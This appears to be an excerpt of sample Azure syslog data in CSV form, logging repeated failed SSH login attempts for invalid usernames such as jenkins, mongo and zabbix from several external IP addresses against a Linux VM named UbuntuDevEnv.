+6682,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:04:02,UbuntuDevEnv,2019-06-26 17:04:01,auth,UbuntuDevEnv,info,Failed password for invalid user mongo from 35.154.19.93 port 44174 ssh2,44422,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mongo,35.154.19.9,44174,,
+6683,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:04:02,UbuntuDevEnv,2019-06-26 17:04:02,auth,UbuntuDevEnv,info,Disconnected from invalid user mongo 35.154.19.93 port 44174 [preauth],44422,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mongo,35.154.19.9,44174,,
+6684,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:04:02,UbuntuDevEnv,2019-06-26 17:04:02,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 44174:11: Normal Shutdown, Thank you for playing [preauth]",44422,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,44174,,
+6685,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:04:06,UbuntuDevEnv,2019-06-26 17:04:06,auth,UbuntuDevEnv,info,Invalid user kui from 81.0.212.18 port 58012,44447,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kui,81.0.212.1,58012,,
+6686,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:04:06,UbuntuDevEnv,2019-06-26 17:04:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18,44447,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.0.212.1,,0,
+6687,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:04:06,UbuntuDevEnv,2019-06-26 17:04:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44447,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6688,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:04:08,UbuntuDevEnv,2019-06-26 17:04:08,auth,UbuntuDevEnv,info,Failed password for invalid user kui from 81.0.212.18 port 58012 ssh2,44447,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kui,81.0.212.1,58012,,
+6689,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:04:08,UbuntuDevEnv,2019-06-26 17:04:08,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 58012:11: Bye Bye [preauth],44447,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,58012,,
+6690,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:04:08,UbuntuDevEnv,2019-06-26 17:04:08,auth,UbuntuDevEnv,info,Disconnected from invalid user kui 81.0.212.18 port 58012 [preauth],44447,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kui,81.0.212.1,58012,,
+6691,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:04:09,UbuntuDevEnv,2019-06-26 17:04:08,auth,UbuntuDevEnv,info,Invalid user bwadmin from 77.237.69.165 port 45728,44461,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bwadmin,77.237.69.1,45728,,
+6692,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:04:09,UbuntuDevEnv,2019-06-26 17:04:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,44461,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
+6693,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:04:09,UbuntuDevEnv,2019-06-26 17:04:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44461,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6694,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:04:10,UbuntuDevEnv,2019-06-26 17:04:10,auth,UbuntuDevEnv,info,Failed password for invalid user bwadmin from 77.237.69.165 port 45728 ssh2,44461,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bwadmin,77.237.69.1,45728,,
+6695,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:04:11,UbuntuDevEnv,2019-06-26 17:04:10,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 45728:11: Bye Bye [preauth],44461,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,45728,,
+6696,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:04:11,UbuntuDevEnv,2019-06-26 17:04:10,auth,UbuntuDevEnv,info,Disconnected from invalid user bwadmin 77.237.69.165 port 45728 [preauth],44461,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bwadmin,77.237.69.1,45728,,
+6697,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:04:32,UbuntuDevEnv,2019-06-26 17:04:32,auth,UbuntuDevEnv,info,Invalid user jenkins from 35.154.19.93 port 47476,44549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,35.154.19.9,47476,,
+6698,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:04:32,UbuntuDevEnv,2019-06-26 17:04:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6699,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:04:32,UbuntuDevEnv,2019-06-26 17:04:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,44549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6700,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:04:34,UbuntuDevEnv,2019-06-26 17:04:34,auth,UbuntuDevEnv,info,Failed password for invalid user jenkins from 35.154.19.93 port 47476 ssh2,44549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,35.154.19.9,47476,,
+6701,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:04:35,UbuntuDevEnv,2019-06-26 17:04:34,auth,UbuntuDevEnv,info,Disconnected from invalid user jenkins 35.154.19.93 port 47476 [preauth],44549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,35.154.19.9,47476,,
+6702,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:04:35,UbuntuDevEnv,2019-06-26 17:04:34,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 47476:11: Normal Shutdown, Thank you for playing [preauth]",44549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,47476,,
+6703,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:05,UbuntuDevEnv,2019-06-26 17:05:05,auth,UbuntuDevEnv,info,Invalid user saslauth from 74.94.246.82 port 41626,44664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,saslauth,74.94.246.8,41626,,
+6704,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:05,UbuntuDevEnv,2019-06-26 17:05:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82,44664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,74.94.246.8,,0,
+6705,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:05,UbuntuDevEnv,2019-06-26 17:05:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6706,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:07,UbuntuDevEnv,2019-06-26 17:05:07,auth,UbuntuDevEnv,info,Failed password for invalid user saslauth from 74.94.246.82 port 41626 ssh2,44664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,saslauth,74.94.246.8,41626,,
+6707,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:07,UbuntuDevEnv,2019-06-26 17:05:07,auth,UbuntuDevEnv,info,Disconnected from invalid user saslauth 74.94.246.82 port 41626 [preauth],44664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,saslauth,74.94.246.8,41626,,
+6708,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:07,UbuntuDevEnv,2019-06-26 17:05:07,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 41626:11: Bye Bye [preauth],44664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,41626,,
+6709,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:08,UbuntuDevEnv,2019-06-26 17:05:07,auth,UbuntuDevEnv,info,Invalid user jenkins from 35.154.19.93 port 50802,44671,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,35.154.19.9,50802,,
+6710,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:08,UbuntuDevEnv,2019-06-26 17:05:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,44671,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6711,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:08,UbuntuDevEnv,2019-06-26 17:05:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44671,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6712,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:10,UbuntuDevEnv,2019-06-26 17:05:09,auth,UbuntuDevEnv,info,Failed password for invalid user jenkins from 35.154.19.93 port 50802 ssh2,44671,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,35.154.19.9,50802,,
+6713,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:10,UbuntuDevEnv,2019-06-26 17:05:09,auth,UbuntuDevEnv,info,Disconnected from invalid user jenkins 35.154.19.93 port 50802 [preauth],44671,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,35.154.19.9,50802,,
+6714,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:10,UbuntuDevEnv,2019-06-26 17:05:09,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 50802:11: Normal Shutdown, Thank you for playing [preauth]",44671,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,50802,,
+6715,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:16,UbuntuDevEnv,2019-06-26 17:05:15,auth,UbuntuDevEnv,info,Invalid user app from 35.154.19.93 port 54066,44703,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,app,35.154.19.9,54066,,
+6716,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:16,UbuntuDevEnv,2019-06-26 17:05:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,44703,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6717,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:16,UbuntuDevEnv,2019-06-26 17:05:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44703,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6718,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:18,UbuntuDevEnv,2019-06-26 17:05:18,auth,UbuntuDevEnv,info,Failed password for invalid user app from 35.154.19.93 port 54066 ssh2,44703,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,app,35.154.19.9,54066,,
+6719,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:18,UbuntuDevEnv,2019-06-26 17:05:18,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 54066:11: Normal Shutdown, Thank you for playing [preauth]",44703,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,54066,,
+6720,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:18,UbuntuDevEnv,2019-06-26 17:05:18,auth,UbuntuDevEnv,info,Disconnected from invalid user app 35.154.19.93 port 54066 [preauth],44703,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,app,35.154.19.9,54066,,
+6721,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:23,UbuntuDevEnv,2019-06-26 17:05:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,44730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6722,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:23,UbuntuDevEnv,2019-06-26 17:05:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6723,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:23,UbuntuDevEnv,2019-06-26 17:05:23,auth,UbuntuDevEnv,info,Invalid user app from 35.154.19.93 port 57322,44730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,app,35.154.19.9,57322,,
+6724,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:26,UbuntuDevEnv,2019-06-26 17:05:25,auth,UbuntuDevEnv,info,Failed password for invalid user app from 35.154.19.93 port 57322 ssh2,44730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,app,35.154.19.9,57322,,
+6725,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:26,UbuntuDevEnv,2019-06-26 17:05:25,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 57322:11: Normal Shutdown, Thank you for playing [preauth]",44730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,57322,,
+6726,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:26,UbuntuDevEnv,2019-06-26 17:05:25,auth,UbuntuDevEnv,info,Disconnected from invalid user app 35.154.19.93 port 57322 [preauth],44730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,app,35.154.19.9,57322,,
+6727,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:30,UbuntuDevEnv,2019-06-26 17:05:29,auth,UbuntuDevEnv,info,Invalid user zabbix from 35.154.19.93 port 60662,44763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zabbix,35.154.19.9,60662,,
+6728,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:30,UbuntuDevEnv,2019-06-26 17:05:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6729,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:30,UbuntuDevEnv,2019-06-26 17:05:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,44763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6730,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:30,UbuntuDevEnv,2019-06-26 17:05:30,auth,UbuntuDevEnv,info,Invalid user ecqadmin from 171.8.199.77 port 48774,44761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ecqadmin,171.8.199.7,48774,,
+6731,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:30,UbuntuDevEnv,2019-06-26 17:05:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=171.8.199.77,44761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,171.8.199.7,,0,
+6732,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:30,UbuntuDevEnv,2019-06-26 17:05:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6733,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:32,UbuntuDevEnv,2019-06-26 17:05:31,auth,UbuntuDevEnv,info,Failed password for invalid user ecqadmin from 171.8.199.77 port 48774 ssh2,44761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ecqadmin,171.8.199.7,48774,,
+6734,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:32,UbuntuDevEnv,2019-06-26 17:05:32,auth,UbuntuDevEnv,info,Disconnected from invalid user ecqadmin 171.8.199.77 port 48774 [preauth],44761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ecqadmin,171.8.199.7,48774,,
+6735,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:32,UbuntuDevEnv,2019-06-26 17:05:32,auth,UbuntuDevEnv,info,Received disconnect from 171.8.199.77 port 48774:11: Bye Bye [preauth],44761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,48774,,
+6736,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:32,UbuntuDevEnv,2019-06-26 17:05:32,auth,UbuntuDevEnv,info,Failed password for invalid user zabbix from 35.154.19.93 port 60662 ssh2,44763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zabbix,35.154.19.9,60662,,
+6737,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:32,UbuntuDevEnv,2019-06-26 17:05:32,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 60662:11: Normal Shutdown, Thank you for playing [preauth]",44763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,60662,,
+6738,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:32,UbuntuDevEnv,2019-06-26 17:05:32,auth,UbuntuDevEnv,info,Disconnected from invalid user zabbix 35.154.19.93 port 60662 [preauth],44763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zabbix,35.154.19.9,60662,,
+6739,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:34,UbuntuDevEnv,2019-06-26 17:05:33,auth,UbuntuDevEnv,info,Invalid user testmail from 77.237.69.165 port 52915,44778,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testmail,77.237.69.1,52915,,
+6740,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:05:34,UbuntuDevEnv,2019-06-26 17:05:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,44778,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
